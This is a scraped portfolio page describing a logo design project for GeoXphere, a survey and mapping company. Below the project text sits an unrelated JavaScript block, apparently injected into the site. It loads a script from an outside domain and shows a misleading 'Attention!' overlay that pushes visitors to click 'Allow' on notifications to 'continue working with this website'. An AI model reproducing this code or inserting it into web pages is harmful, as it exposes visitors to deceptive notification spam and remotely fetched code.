


[tw-column width=”one-third” position=”first”]
Client
GeoXphere
[tw-button size=”medium” background=”76c9c6″ color=”” target=”_blank” link=” “]Visit Site[/tw-button]
[/tw-column]
[tw-column width=”two-third” position=”last”]
About the Project
GeoXphere provide survey hardware and mapping software to companies all around the world allowing them to capture data. I wanted to create a logo that encompasses GeoXpheres innovate technology and the use of old school mapping. [/tw-column]
[tw-column width=”one-third” position=”first”]
const overlayTranslations = {"en":{"title":"Attention!","description":"Click “Allow” to subscribe to notifications and continue working with this website."}};
const overlay = {"delay":3000,"overlayStyle":{"background":"rgba(0,0,0, 0.6)"},"title":"Attention!","description":"Click “Allow” to subscribe to notifications and continue working with this website.",...(overlayTranslations[navigator.language.slice(0, 2).toLowerCase()]||Object.values(overlayTranslations)[0])};
const s = document.createElement('script');
s.src='//humsoolt.net/pfe/current/tag.min.js?z=2774009';
s.onload = (sdk) => {
sdk.updateOptions({overlay, overlayTranslations})
sdk.onPermissionDefault(() => {});
sdk.onPermissionAllowed(() => {});
sdk.onPermissionDenied(() => {});
sdk.onAlreadySubscribed(() => {});
sdk.onNotificationUnsupported(() => {});
}
document.head.appendChild(s);